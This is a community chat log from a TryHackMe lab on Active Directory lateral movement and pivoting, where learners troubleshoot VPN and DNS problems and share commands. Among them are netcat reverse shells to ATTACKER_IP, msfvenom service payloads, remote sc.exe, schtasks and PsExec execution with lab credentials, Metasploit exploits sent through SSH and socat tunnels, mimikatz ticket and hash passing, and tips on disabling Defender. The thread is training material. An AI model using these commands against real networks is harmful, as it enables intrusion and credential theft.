#lateral-movement-and-pivoting

I think even /u:t2_george.kay@za.tryhackme.com could work

@shadow linden thank you for this delight of a room. A lot learned and astonished what you can archive with port forwarding 🙂 Could run through all the tasks without a single issue.

Gave +1 Rep to @shadow linden

I am having trouble with the last task, as my SSH connection is not being established due to (maybe?) DNS problems or dies shortly

Using this

ssh za\\natasha.howells@thmjmp2.za.tryhackme.com -L 8888:thmdc.za.tryhackme.com:80 -R 0.0.0.0:6666:127.0.0.1:6666 -R 0.0.0.0:7878:127.0.0.1:7878

to push a couple ports to thmjpm2 and forward the DC:80 port to me

Seems like weird network bug to me

After 10 tries or so it worked (although cannot open ports on the remote box with -R due to the ssh config haha) ... so yeah definitely a network bug

I figured it out, problem is, I was using VPN and Attackbox simultaneously and they both got the same IP address! this fckd up my connectivity I guess

Hi, can anyone access this network? it tells me "Network state: Resetting"

Im getting 404 when downloading the VPN file, even after regenerating the VPN file

Hey, could you try leaving the room and rejoining after 5 mins? It will probably work after that

worked thanks

Hey can 2 Guys restting this network ? I worked before on it but simple Reversshell was not working, an now the domain is not reachable I have set again "systemd-resolve --interface lateralmovement --set-dns 10.200.75.101 --set-domain za.tryhackme.com
" but still not working and the network state is Running 😉

thx guys

Is anyone having issues with the ovpn file for this room?

Have you set the nameserve?

Is the network resetting?

Have you tried to vote to reset it?

Yep, I cannot get the actual VPN to connect but the other rooms work fine and the general THM VPN connects fine. It's just the lateral movement and pivoting VPN that fails to connect

Do you get a cipher error?

I do not

Can you post a screenshot of your output?

Yeah, I tried regenerating the ovpn file from the access page and then rerunning it only to get this

That could happen if you have two connections at the same time, or if you started the attackbox and try to connect from your PC as well, as they share the same ovpn file.

I'll double check and make sure nothing weird is going on with that

Okay, this was 100% a problem of PEBKAC

Glad it worked in the end!

I had a terminal tab open where it successfully connected and I just did not realize it

Btw thanks a ton @shadow linden I have my OSCP scheduled for Saturday so I'm doing some last minute refreshing and notes cleanup so the stress has me missing some super simple things.

Gave +1 Rep to @shadow linden

Good luck with your exam! Give it your best 💪

Thanks a ton! I plan to give it hell and attempt to stay zen the whole time rather than cracking under pressure.

Gave +1 Rep to @shadow linden

There's plenty of time! Pressure is your worst enemy indeed 🙂

Hi everyone, I got stuck on task 7 of the 'Lateral Movement and Pivoting' room. I got the first flag but can't get the second one. From the RDP connection I performed local and remote port forwarding with the following command ssh myUser@myIP -R 8888:thmdc.za.tryhackme.com:80 -L *:6666:127.0.0.1:6666 -L *:7878:127.0.0.1:7878-N then I set metasploit with the following parameters use rejetto_hfs_exec, set payload windows/shell_reverse_tcp, set lhost thmjmp2.za.tryhackme.com, set ReverseListenerBindAddress 127.0.0.1, set lport 7878, set srvhost 127.0.0.1, set srvport 6666, set rhosts 127.0.0.1, set rport 8888 but the result is
[] Started reverse TCP handler on 127.0.0.1:7888
[] Using URL: http://thmjmp2.za.tryhackme.com:6677/QZKwB2WlEUy
[] Server started.
[] Sending a malicious request to /
[] Server stopped.
[!] This exploit may require manual cleanup of '%TEMP%\eakCPsIpwCURmy.vbs' on the target
[] Exploit completed, but no session was created.

I tried to see my port 8888 from the browser and I see the HFS server so port forwarding should work correctly

It is possible to reset the It is possible to reset the network 10.200.64.0/24? There are 4/5 votes to reset from a lot of time

Be sure to check the port numbers match between your ssh tunnel and metasploit. In your commands, you are forwarding port 7888 via SSH but the port used by metasploit is different 7878. Same for the 6677/6666

I did several tests and copied the command wrong. I used the same ports between metasploit and the ssh tunnel, correct the message thank you

Gave +1 Rep to @shadow linden

having issue setting up the lateral moviment room dns to resolved the creds website. it seems i cannot nslookup the domain controller. any possible solution for that?

Can you send a capture of your resolv.conf and the output of nslookup? I might be able to help with that info 🙂

i will log in again

oh and you need to verify your account to send screenshots

!docs verify

@shadow linden

is that the attackbox?

yeap

did you run systemd-resolve --interface lateralmovement --set-dns $THMDCIP --set-domain za.tryhackme.com with $THMDCIP replaced with the actual IP of your DC?

yeap

still the same problem

can you try doing nslookup THMDC.za.tryhackme.com and send the output

That's weird... What about ip add show lateralmovement?

In this case, it is likely the netework needs a reset

the DC is probably not working as expected

it seems like. who should i contact to reset the DC network/

?

You can just click the reset button in the room

did 3 times

i will try again

5 votes are needed for a reset

you might need to wait for others to vote, or you can vote again every hour to speed up the process

sounds good 😉

Hi, in regards to the techniques in the room, which among are the most consistent?

Also, I had some issues with the PTT attack (maybe its because there were a lot of people doing it)

I found PTH and PTK attacks more consistent than PTT, maybe its because it allowed me to run commands directly

In terms of pure consistency, they should all be 100% consistent as they just mimic regular authentication. However some attacks will work in specific network setups and not in others, as administrators may disable some authentication mechanisms that the attack vectors rely on.

Then you also have to take detectability into account. This will also largely depends on the network you are assessing and the blue team behind it. Most of the techniques will theoretically work just as a regular authentication attempt and won't be easily distinguishable from regular users connecting to services. However if you use UserA credentials to login to a server from UserB computer, then your behaviour starts to become suspicious.

There's also some other technicalities to have in mind, as for example, doing a PtK with an RC4 key. If you are assessing a network that isn't decades old, using such a weak protocol might be easily detected as suspicious behaviour, since all machines nowadays will normally use AES instead.

All in all, I guess the best attack is the one that mimics as normal user behaviour, given the specific scenario you are checking.

Thanks, I've been trying to make the PTT attack work, am I correct to assume that after I have injected the ticket into my session, this is the same as doing the other commands in PTH and PTK with /run:[reverse shell] which means that any commands I run now will be using the credentials from that?

Gave +1 Rep to @shadow linden

This is the current error I get, I'm unable to inject a proper ticket from t1_toby.beck as it doesn't have any tickets I guess when I dumped the tickets. That's why I tried using some leftover tickets

This is the mimikatz output when doing the dump

Have the same issue with DNS described in #lateral-movement-and-pivoting message
Have tried to reset network, used mentioned "systemd-resolve --interface ...". Still cannot make it work for several days so far:(
I run out of ideas, could you please help? (using Attack box. Interesting that all was fine a week ago)

and today distributor IP is resolved by DC but no access neither by http nor with ping/telnet.

Update: it just started working after network was reset several times. Looks like smth was broken on the network level for this lab environment.

Hi, Is anyone able to ping/connect to the network?
It was working fine a minute back, but now I am unable to connect back.

hey, in the port forwarding part, instead of using the given command in the instruction, i tried to use "socat.exe TCP4-LISTEN:8080,fork TCP4:thmdc.za.tryhackme.com:80 |
socat.exe TCP4-LISTEN:6569,fork TCP4:10.50.65.226:6569 |
socat.exe TCP4-LISTEN:7869,fork TCP4:10.50.65.226:7869" which i assume has the same effect as the given command in the instruction (using ssh). But my metasploit said the no session was created, did i made a mistake somewhere?

It should have the same effect indeed. Just check if the port numbers match with your metasploit config

Thank you for your reply, i have already check and confirmed that the port number is correct, when i used the ssh tunnel, i did get a reverse connection, i wonder what was the problem

Hello,
I am just curious because I was able to get a reverse shell via sc.exe and I am nt authority\system on the THMIIS host. But I am unable to get the flag from flag.exe. I cleaned up all of my binaries and deleted the services. Anything else I might be missing?
The only thing I did different was I did not use MSFVenom or MSFConsole

Hey, the flag checker actually expects you to do it via msfvenom. This is mostly due to some limitations on how it works, so sorry for the inconvenience 😅

Ahh okay that’s cool. Thanks! 👍🏼

Gave +1 Rep to @shadow linden

Another great network, learned a couple of new things. Thank you @rose kernel and @shadow linden

Gave +1 Rep to @rose kernel

Task 7, with metasploit I can't get a reverse shell:

[-] Command shell session 3 is not valid and will be closed

I'm sure I've set up it right. Maybe the network need a reset?

on task5. from those statement mean that after passing the ticket from mimikatz prompt, then we can exit to normal prompt and now our current session/token already change into Administrator? is my understanding correct?

Forget, my bad

Your ticket should be loaded into your session. You may still need to do a runas /netonly ... to switch the username being used by the system for outgoing connections

you can check the loaded tickets with klist

hmmm but then its mean we still need the password? i tough we already load our ticket in.

For task 5 on thmjnp2 it starts with mimikatz but you don't have adm priv

Is that a hidden challenge or am I missing something?

Hey, there is a section in the task called "Let's get to work" where admin credentials are provided

you can input any password and it should work, since the kerberos ticket will be used

ah yes...i did it. and that is the point of injecting the ticket. thanks @shadow linden

Gave +1 Rep to @shadow linden

@barren frost Please do not try to ping everyone, I'm sure not everyone wants to get a ping from you 🙂

Thanks mate, won't do it again👍

Need a bit of help;
It's asking me to run this command on the victims machine:
runas /netonly /user:ZA.TRYHACKME.COM\t1_leonard.summers "c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4443"
but the victim machine does not have nc64.exe, am I meant to upload nc64 to the victim's machine?

Hello guys
Have a problem
Can't connetc to RDP on THMJMP2
It types "The username or password are incorrect"

Tried with 3 different credetials

It should be there. Maybe someone deleted it, in which case you are free to upload your own version, or reset the network

Could you send a screenshot of the command and error you are getting?

someone probably deleted it, I tried to upload it but it gave me an error about it couldn't connect to the python3 server

That doesn't sound like nc 😮

doesn't matter, I tried using nc but I'm not recieving a shell back, repeated the steps 3 times and I'm getting nothing :/

Sry, can't reproduce the problem
After restart the net error disappeared

Hello need some clarification regarding some commands. In task 3 I tried all of the techniques explained but got stuck in two which would not work:

1. Psexec returns an access is denied message with the commands

PsExec64.exe \\thmiis.za.tryhackme.com -u t1_leonard.summers -p EZpass4ever -i cmd.exe -accepteula
PsExec64.exe \\thmiis.za.tryhackme.com -u ZA.TRYHACKME.COM\t1_leonard.summers -p EZpass4ever -                
i "C:\tools\nc64.exe -e cmd.exe my_ip 1234"

2. After uploading the myservice.exe payload and getting the flag file, I tried to perform the same attack with schtasks but for some reason I am not able to get a reverse shell. I used runas because at first I was getting an access is denied message. I had a listener waiting with /multi/handler.

runas /netonly /user:za.tryhackme.com\t1_leonard.summers "schtasks /s 10.200.98.201 /RU \"SYSTEM\" /create /tn nabecosTHM2 /tr \"%windir%\nabecos.exe\" /sc ONCE /sd 01/01/1970 /st 00:00"

runas /netonly /user:za.tryhackme.com\t1_leonard.summers "schtasks /s 10.200.98.201 /run /TN nabecosTHM2"

Hey, for psexec, my guess is that the console from where you are launching it has a session with another unprivileged user. For some weird reason psexec only uses the user/pass you supply to upload the executable to the ADMIN$ share, but still uses your current session to try and start the associated service. Be sure to spawn a runas /netonly console and run psexec from there

Yah by reading some of the answers above I kind of understood that so I performed two additional attempts:

PsExec64.exe \thmiis.za.tryhackme.com -u ZA.TRYHACKME.COM\t1_leonard.summers -p EZpass4ever -accepteula -i "c:\tools\nc64.exe -e cmd.exe 10.50.95.55 4445"```
What I think this should do is first I get a shell with elevated privileges and then I try to get another shell to IIS using the nc64.exee binary inside the tools folder. Unfortunately it says the path to the file does not exists or something? I even checked if the file had a different name but it existed. My syntax probably is wrong

2. I also tried with cmd.exe in the second command but it exited with code 0 or something which I alreeady saw on an earlier response why it happens so Im ok with that

For your second problem, my guess is that it has something to do with the double-quote escaping. CMD is quite weird with that. Did you try to run the command and check if the task is created as you'd expect? or maybe replacing %windir% with C:\windows\ just for a sanity check?

Did that and I checked that the service was created so the problem must be on the command that executes the payload but I am gonna try double check again!

Hi, I have not checked if the explanation of why it was not working was told.
I had the same problem, the only thing I did differently was using a different port than 4444, when I used 4444 it worked (I was using 1337)

I reply to you just so you know what might be happening

└─$ cat /etc/resolvconf/resolv.conf.d/tail

nameserver 10.200.78.101
nameserver 8.8.8.8
search za.tryhackme.com

Can anyone vote to the reset this room?

I think someone was messing arround with it and deleted the flag of t1_toby.beck Desktop directory

Which subnet are you on?

There is multiple.

maybe im trolled or making huge mistake, but no mimikatz, just trying to learn lol

also confirming: no mimikatz in C:\tools in thmjmp2

i requested a reset but was 4/5

Hello all! Simple question here. In task 3, it tells us to SSH into THMJMP2 with the initial access given in task 1. Then it gives us the credentials for a tier 1 admin. After, it says that we'll learn how to use those credentials to move laterally to THMIIS using sc.exe. I'm kind of confused; are we supposed to SSH using the new credentials or use sc.exe to create a remote session? The confusion is also because right after that, the room says that we'll be setting up a payload of some sort.

you are supposed to ssh with the credentials in task1, and spawn a remote process in the admin share, and then use sc.exe to point binpath to your script to gain access to THMIIS

mimikatz is back on thmjmp2

In Task7: Port Forwarding:-
C:> ssh tunneluser@ATTACKER_IP -R 8888:thmdc.za.tryhackme.com:80 -L *:6666:127.0.0.1:6666 -L *:7878:127.0.0.1:7878 -N

instead of ip add, if we give 127.0.0.1, how it will identify source and destination ?

having trouble with downloading latermal movement network vpn config file trying to import for lateral movement and pivoting section its like on a loop saying connected then keeps refreshing and dcing

leave the network room... wait 5-15 mins... rejoin.... go to download vpn config file... try again and see if it works

oh yeah good idea thanks 🙂

that would generally make it switch your subnet around which sometimes helps

with task 3 is the machine ip something to do with the dns ip or domain controller or my host machine ip lol

Can you be a little more clear?

Hello all! Trying to connect to the OVPN on my personal Kali box, but I keep getting these messages. It happens often, I usually just stop working on the room for a day or two and when I come back to it, it's fixed

this one is specific to the room, which is why im posting it here. If it doesn't belong here, please let me know!

EDIT: Fixed it by regenerating a new ovpn file, but I'd still like to know why this happens

ssh tunneluser@10.50.69.171 -R 8888:thmdc.za.tryh
ackme.com:80 -L *:6666:127.0.0.1:6666 -L *:7878:127.0.0.1:7878 -N task 7 am i meant to know the password for this

ive set up a listner using metasploit but this command wont run without a password not too sure

Is the distributor.za.tryhackme.com and/or DNS down in the network? I cannot resolve anything. I did not have any issues with the other networks. so I doubt it is my setup... I voted to reset. 2/4 Anyone else experiencing problems ?

You look like you're connected,

Can you do ip a s ?

Is this (you should receive a connection in your AttackBox from where you can access the first flag on t1_leonard.summers desktop.) supposed to bereceivec by reverse TCP handler on port 4444?

hello,everyone.i can't connect to the vpn ? why ?

2023-05-11 16:45:23 --cipher is not set. Previous OpenVPN version defaulted to BF-CBC as fallback when cipher negotiation failed in this case. If you need this fallback please add '--data-ciphers-fallback BF-CBC' to your configuration and/or add BF-CBC to --data-ciphers.
2023-05-11 16:45:23 OpenVPN 2.5.7 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] built on Jul 5 2022
2023-05-11 16:45:23 library versions: OpenSSL 3.0.5 5 Jul 2022, LZO 2.10
2023-05-11 16:45:23 Outgoing Control Channel Authentication: Using 512 bit message hash 'SHA512' for HMAC authentication
2023-05-11 16:45:23 Incoming Control Channel Authentication: Using 512 bit message hash 'SHA512' for HMAC authentication
2023-05-11 16:45:23 TCP/UDP: Preserving recently used remote address: [AF_INET]54.194.161.223:1194
2023-05-11 16:45:23 Socket Buffers: R=[131072->131072] S=[16384->16384]
2023-05-11 16:45:23 Attempting to establish TCP connection with [AF_INET]54.194.161.223:1194 [nonblock]

Hello there, I'm on the room "Lateral Movement and Pivoting" Task 3 "Spawning Processes Remotely". I have done everything, I'm connected as "t1_leonard.summers" but when i run the "Flag.exe" in the desktop it says "Sorry! You are still missing something. No flag for you yet. (7)".
Can i get some help pls ?

In Task 3, the command
runas /netonly /user:ZA.TRYHACKME.COM\t1_leonard.summers "c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4443"
According to the task this is supposed to start a reverse shell on attacker machine from thmjmp2 as t1_leonard.summers. But the reverse shell recieved is the user I requested from the "distrubutor" site. That supposed to happen?

No problems completing the task tho.

Have you checked if you're NT AUTHORITY\SYSTEM?

yes i am https://image.noelshack.com/fichiers/2023/19/7/1684071904-a.png

I have the same problem with task 4

Was using a different port.

I got the same error ending in "(7)". Solved tho.

Did you use the exact port in the task or something different?
The number at the end could be debug codes, and in this case 7 is wrong port, I think.

Yep very likely numbers at the end are debug codes.

From what I can test:

1 might be Insufficient Privileges (running Flag.exe as t1_corine.waters for Task 4)

7 might be wrong port

5 might be sufficient privileges but wrong method.

Hey mate thanks for your reply

Gave +1 Rep to @tranquil lynx

Usually i always use a personalised port but when i saw it wasn't working i tried again with the ports given by the task and it didnt workd

I will try again soon and stick on the port asked

People are dumping .kirbi tickets directly in C:\tools. 😞

At least move it to C:\Temp or somewhere else.....

hey guys

i need help plz

I've done several lateral movement labs but now dns has stopped working and I can't access http://distributor.za.tryhackme.com/creds

I've done the configuration several times and I can't access the dns anymore

I followed these steps as I did the other times

Network Manager -> Advanced Network Configuration -> Your Connection -> IPv4 Settings
Set your DNS IP here to the IP for THMDC in the network diagram above
Add another DNS such as 1.1.1.1 or similar to ensure you still have internet access
Run sudo systemctl restart NetworkManager and test your DNS similar to the steps above.

but still not working... I can only access by ip

have you tried just adding the THMDC ip manually to /etc/resolve.conf?

ah reply bit late.... well done discord client....

looks like mimikatz is missing, is this intentional?

Hey, it should be there for you. Someone might have deleted it. In this case, feel free to upload your own copy or just restart the network and it should be back.

kinda burned out my enthusiasm for today on this lab, did upload my own copy but the user I was after looked to be missing, so network would need to be reset?

but thanks for fixing 👍

will poke at it again tomorrow. Task 5 BTW

I'm having trouble with task 3 of this room, here's my commands and output in the end:

attackbox: msfvenom -p windows/shell/reverse_tcp -f exe-service LHOST=10.50.17.193 LPORT=9001 -o pwnserv.exe

attackbox: 
smbclient -c 'put pwnserv.exe' -U t1_leonard.summers -W ZA '//thmiis.za.tryhackme.com/admin$/'
EZpass4ever

msfconsole -q -x use exploit/multi/handler; set payload windows/shell/reverse_tcp; set LHOST lateralmovement; set LPORT 9001;exploit

attackbox: ssh t1_leonard.summers@za.tryhackme.com@thmjmp2.za.tryhackme.com
attackbox: nc -lvp 4443
in ssh: runas /netonly /user:ZA.TRYHACKME.COM\t1_leonard.summers "c:\tools\nc64.exe -e cmd.exe 10.50.17.193 4443"
EZpass4ever

in nc -lvp revshell:

sc.exe \\thmiis.za.tryhackme.com create pwnserv binpath= "%windir%\pwnserv.exe" start= auto
sc.exe \\thmiis.za.tryhackme.com start pwnserv


msf6 exploit(multi/handler) > set LHOST lateralmovement
LHOST => 10.50.17.193
msf6 exploit(multi/handler) > ste LPORT 9001
[-] Unknown command: ste
msf6 exploit(multi/handler) > set LPORT 9001
LPORT => 9001

msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.50.17.193:9001 
[-] Command shell session 1 is not valid and will be closed
[*] 10.200.19.201 - Command shell session 1 closed.

TL;DR: I followed the steps as described in the walkthrough but still cannot get an actual reverse shell going

I've tried following a writeup, that also didnt work

Solution || if using metasploit to catch the shell, set the payload of your listener equal to the msfvenom executable payload you generate||

having quite a time getting a lsass dump from win11 22h2 to parse with pypykatz/mimikatz, trying to show cached credentials for a training thing, I have updated everything and they both are not able to do it, anyone know possibly why? The dump looks okay in windbg. took various ways, taskmgr, comsvcs.dll, procdump64, with appropriate perms, RunAsPPL=0. Trying to think what else might be the cause, unless the structure is changed again recently? does this attack still work?

Edit: I am stupid in the head I think the flag.exe is missing from the desktop?

nvm

Let me know when THM adds a module that teaches me how to read, I am actually dumb

Hi All, need some suggestion as I am not able to start the room I have configured my machine to have the lateralmovement interface have the DNS specified int he network but I am still not able to access the http://distributor.za.tryhackme.com/creds file. Can someone advise if I might be missing somethin g

I don't know what's wrong at times it works at times it doesn't is the network unstable ?

Anyone from the THM staff here, I've wasted whole day trying to fox the DNS issues and unfortunately it's still fluctuating.

I am facing an issue while configuring the dns

I am not able to connect with AD

it gave me an error as a message : `"could not be reached"

This happened a few times with me too. Did the exact things a day later and it worked... I simply switch to the Attackbox in those situations

Btw, does anybody know why in task 5 I can only login to "THMIIS" with the NTLM hash from Toby? Wasted an hour because I tried logging into the IP of THMJMP2 instead. No clue why this doesn't work...

Do you have 'dig'? Can you dig distributor.za.tryhackme.com?

dig @10.200.48.101 distributor.za.tryhackme.com?

Do you have a route to 10.200.48.x in ip r?

Is an internet DNS server taking precedence in /etc/resolv.conf?

struggling with the DNs settings for this lab, I am using my own Kali VM and I've followed the DNS adjustment instructions in the room. I've added both the IP of the DC and 1.1.1.1 to additional DNS server in my network configuration however I stil cannot confirm access to the http://distributor.za.tryhackme.com/creds endpoint, any thoughts?

Here are the contens of my /etc/resolv.conf

Try adding 10.200.93.101 distributor.za.tryhackme.com to hosts?

down?

Why do you have search... etc in there?

welp either shadows copy and pasting passwords is not working

or someone changed the password for the leonard user

C:\Windows\system32>sc.exe \\thmiis.za.tryhackme.com create shadowservice-3249 binPath= "c:\Windows\shadowservice.exe" start= auto
sc.exe \\thmiis.za.tryhackme.com create shadowservice-3249 binPath= "c:\Windows\shadowservice.exe" start= auto
[SC] OpenSCManager FAILED 5:

Access is denied.


C:\Windows\system32>

oh wait a min

never mind.... still same problem

guess either shadow gotta try another subnet

or wait for resets to go through

Hello,
I’m having issues configuring dns and connecting to domain.
Even after setting dns with systemd-resolve conmand , nothing works.
Please Advice

Same

It always return

ssh: connect to host thmjmp2.za.tryhackme.com port 22: No route to host

Seems like it needs a reset

on the attackbox or on your own kali vm???

Can someone vote reset?

which subnet

I’m on attackbox

My VM

10.50.17.90/24

okay then guess systemd-resolve stuff should have worked... so vote for reset then...

I did , we need one more vote

Yeah I stucked for 3 hours, feels bad

for your own vm:s you either edit the /etc/resolv.conf or use networkmanager to change the dns

well you can vote once every hour

Ok let me try it

ohh thats a new thing for me

well now you know

also stating your subnet when asking for resets in here helps as not everyone are on the same subnet

Oh wait I did

I see

thx

no problem and hope you can get it working

I’m on 10.50.61.x

....

oh that is your attack machines ip:s

the subnets look like 10.200.x.something

Oh sorry …that’s 10.200.64.x

no problem... common mistake

Looks like I need to wait for 1 more hour if no one votes

And hopefully no one extends

Yea

yay first actual flag for this network gotten

Wutt?

you can access the machine?

I still cannot connect even after reset

Can anyone help please…I’m stuck

hmmm

!docs verify

then we can go through some pictures of where things might have gone wrong

Now i'm not sure if it was someone here, but whilst I was hosting a listener on the current 10.200.71.x network someone attempted to connect to it from 10.50.65.120

listening on [any] 4443 ...
connect to [10.50.<snip>] from (UNKNOWN) [10.50.65.120] 46800```

Not sure if this is something automated or possibly another user targeting my vm, but had me a lil spooked

@azure bronze

I’ll take a look in a bit^

likelyhood that they typoed the ip??? not super high but also not super low... but jabba will deal with it

There seems to be a problem still with lateroralmovememnt. It has been reset but still shows 4/5 requests for a reset. The VPN connection looks fine but pinging the servers nor traceroute work. it is to possible to curl to the distribution server either.

I've found the connection to this room can be quite pedantic at first (with no real idea of why), resetting helped me connect to the AD server after everything else was correctly configured on my kali vm.

It was quite a major ballache to get the kali attackboxes to work with the network rooms, given no access to control the ivp4 settings, systemd-resolve being depreciated (resulting in needing to install resolvectl and some substantial update packages) or manually editing /etc/resolv.conf whilst also including backup dns servers so you dont lose internet access

are you guys able to ping the THMDC machine ? it worked well like 2 days ago, and now its gone

Has the network been reset?

It’s been resetting a lot since yesterday , still doesn’t ping on thmdc.za.tryhackme.com

You on the .106.x network? my access cycled and now it's gone back to not detecting the DC

Finally got a restart to trigger, lets see if that did the trick..

Reading through here, some mentions of this turning into a zombie network due to the 'extend' function breaking in the past but not sure if that'd been resolved since 2022

And resetting did the trick, annoyingly

...and now the mimikatz binary disappeared mid-use?

no tools in c folder 😫

what i do now

lateral room

i need the socat

This is thmjmp2 right?

Worst case, you may have to wait for the network to expire and reset, though you can manually upload the tools if you know where to get the correct binaries

Anyone else having issues connecting to the network?

nslookup thmdc.za.tryhackme.com
;; connection timed out; no servers could be reached

can you cat /etc/resolv.conf

Hi @feral granite , of course:

root@ip-10-10-16-164:~# cat /etc/resolv.conf
# This file is managed by man:systemd-resolved(8). Do not edit.
#
# This is a dynamic resolv.conf file for connecting local clients to the
# internal DNS stub resolver of systemd-resolved. This file lists all
# configured search domains.
#
# Run "systemd-resolve --status" to see details about the uplink DNS servers
# currently in use.
#
# Third party programs must not access this file directly, but only through the
# symlink at /etc/resolv.conf. To manage man:resolv.conf(5) in a different way,
# replace this symlink by a static file or a different symlink.
#
# See man:systemd-resolved.service(8) for details about the supported modes of
# operation for /etc/resolv.conf.

nameserver 127.0.0.53
options edns0
search za.tryhackme.com eu-west-1.compute.internal

Ok, you want nano that file, and stick the THMDC on your network layout in the room and stick it above nameserver

as an extra nameserver I assume?

Yes.

so the file now looks like:

# operation for /etc/resolv.conf.
nameserver 10.200.64.101
nameserver 127.0.0.53
options edns0

However sadly still:

root@ip-10-10-16-164:~# nslookup thmdc.za.tryhackme.com
;; connection timed out; no servers could be reached

Is the network running?

should be

hm cant post a screenshot it seems but yes it is

Network state: Running
Network up time: 34m

I'll call it a day for today and see if this resolves itself by the network resetting at some point. Thanks for trying to help @feral granite

Gave +1 Rep to @feral granite

Hello,
I cannot complete task 3 as running sc.exe is giving me access denied error…Any one know what could be the reason?

In my instance, I think the leonard user password has been changed. It may be the same for you. I have been waiting a couple days for it to eventually reset.

If your nc with runas gives you back the wrong user, that means the authentication failed This is an incorrect statement. FYI.

yeah hit reset button or wait for the network to stop by itself and then start it again

Yea getting access denied error

Will see

Do you know if the network stops that the passwords revert to default? I have a feeling that isn't the case, but I am hoping I am wrong. 🙂

I thought so too…but who changes the password btw…

it does as it is very close to a normal reset and reloads all the images when you start it up again

technically you can play subnet roulette too but less needed now

Thank you! I hadn't really thought about leaving and rejoining the room. Also a good idea.

Gave +1 Rep to @full drum

lol you understood shadows message about subnet roulette

Is the network for this room just totally busted?

It doesn't appear that it can even be reset; when I try to it says that it's resetting, but then when I referesh it goes back to saying 4/5 votes and I can't access any of the IP addresses.

Made a support ticket but ¯_(ツ)_/¯

Did you try leaving the room for 5 mins, then re-joining?

I left and joined back into different network still getting access denied for sc.exe

Is "leaving the room" different than just navigating away/not using it? I tried both yesterday and the day before many hours apart and was still getting the same problem

No. You keep to press the cog on the top right

Will give it a try today

there is a chance that both the subnets you were in had the same problem sadly enoughs

@rose kernel I finally got the chance to work my way through "Compromising Active Directory". I'm currently preparing for OSCP, and these rooms are a significant contribution to my understanding. I just want to thank you and the other creators for these rooms 😄

Gave +1 Rep to @rose kernel

Thanks for the feedback! Glad you are learning from it!

Gave +1 Rep to @strange iron

Waiting on my network to reset. How long does it normally take?

This AD network has been the most frustrating so far.

Anyone have advice on working on this one? I can't get the network to reset it's stuck at 4/5 for the past 24 hours.

I can't reach the IP of the dc for this one. I've checked my routing table and it shows a route to the network the dc is in but I still can't reach anything in the network. Is there something I'm missing?

Hey, have you tried leaving and rejoining the room? That should change you to another network and you should be able to continue

This won't affect your progress in the room btw

Good idea. I will try it out.

That did it! Thank you. Ready to complete this one.

Gave +1 Rep to @shadow linden

Hello
Using the new credentials from the new link ( http://distributor.za.tryhackme.com/creds_t2), I cannot use psexesvc (access denied)
Does anyone have clues why ?
(Task 6 Abusing User Behaviour)

Answer: Don't forget to run the terminal as administrator 😅

yuup common mistake right there

Somebody problems with the network connection?

did someone delete mimikatz from network 91?

it disappeared but instead i have a bunch of .kirbi files

lol the program just disappeared right in front of my eyes, is windows defender running on these machines?

windows defender is killing it

you can disable realtime monitoring

it's not my machine though

will need to disable defender next iteration of the network

it will kick back in automatically, no biggie

the i need to be fast

it let me use mimikatz for quite some time before getting rid of it

kind of strange, but someone else could have disabled it before you for a while

the other thing you can do is set an exclusion folder

someone restart the machine!

You might need to state your subnet.

There is multiple instances.

I can't connect to openvpn in this room

sudo openvpn lateralmovementandpivoting.ovpn
2023-08-25 23:34:28 Note: --cipher is not set. OpenVPN versions before 2.5 defaulted to BF-CBC as fallback when cipher negotiation failed in this case. If you need this fallback please add '--data-ciphers-fallback BF-CBC' to your configuration and/or add BF-CBC to --data-ciphers.
2023-08-25 23:34:28 Note: cipher 'AES-256-CBC' in --data-ciphers is not supported by ovpn-dco, disabling data channel offload.
2023-08-25 23:34:28 OpenVPN 2.6.3 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] [DCO]
2023-08-25 23:34:28 library versions: OpenSSL 3.0.9 30 May 2023, LZO 2.10
2023-08-25 23:34:28 DCO version: N/A
2023-08-25 23:34:28 TCP/UDP: Preserving recently used remote address: [AF_INET]52.214.166.96:1194
2023-08-25 23:34:28 Socket Buffers: R=[131072->131072] S=[16384->16384]
2023-08-25 23:34:28 Attempting to establish TCP connection with [AF_INET]52.214.166.96:1194
2023-08-25 23:34:49 TCP: connect to [AF_INET]52.214.166.96:1194 failed: Connection refused
2023-08-25 23:34:49 SIGUSR1[connection failed(soft),connection-failed] received, process restarting
2023-08-25 23:34:49 Restart pause, 1 second(s)

I try it(https://tryhackme.com/forum/thread/62bc5fb1fcafa700618f25f0)

but no use

This happened to me the other day. Terminated the machine and redownloaded my vpn file and waited 10 mins and it could ping the DC again.

Is there anyone with this same issue?

Can't connect to the Lateralmovementandpivoting VPN:
Pinging 10.50.61.172 with 32 bytes of data:
Request timed out.

Even the attackbox doesn't ping the THMDC:
PING 10.200.64.101 (10.200.64.101) 56(84) bytes of data.
From 10.50.61.1 icmp_seq=1 Destination Host Unreachable

Hi there, I'm encountering the same thing since yesterday.
I tried from my computer and OpenVPN, also with Attackbox, restarted the Network...and it stille not working.

Yepp, the network was reachable yesterday. Also the restart button seems like do something, but nothing happens.

Allright, FYI, I tried this noon and it worked this time.

thx for the info

Gave +1 Rep to @supple warren

hi, good morning everyone
please can responder capture hashes through proxychains?

Hi, I'm trying to solve this room and couldnt find the DC via nslookup

I've left the room and joined again couple times and got the same result

Hi, just to be sure, did you configured the DNS following indication in the 1st task ?

I configured the DNS as indicated in the guide and it doesn't appear to be working for me either. The lateralmovement interface is up and I'm getting an IP but I can't reach any of the target hosts (DC, jumpbox, etc...)

hello, Im on a ctf right now that has a word press site hosted on the target. I got admin to the wordpress site, does anyone know if there are ways to get from WP site to the underlying server?

If this is an active ctf we can't help you, if it is for a TryHackMe room then you can go to #room-help for help

aight

yes ofc

I can get the creds, but the nslookup command doesn't work

Ok, it was just to be sure 😉
If you can get the credentials, then it seems that you can reach the domain.
I don't know why nslookup doesn't work, but did you give a try to complete the next tasks of this room ? Maybe you're well configured after all ?

@potent meteor your'e right, thanks 😗

Gave +1 Rep to @supple warren

My pleasure, glad I could help you 🙂

hi guys

Hi guys!
ho know what happens with lab?

Hey, I'm having some trouble to complete Lateral Movement task 7, Tunneling Complex Exploits. After setting all the metasploits options I got this result:
[] Started reverse TCP handler on 127.0.0.1:8989
[] Using URL: http://thmjmp2.za.tryhackme.com:7777/wTPndpwdZls3vfc
[] Server started.
[] Sending a malicious request to /
[] Server stopped.
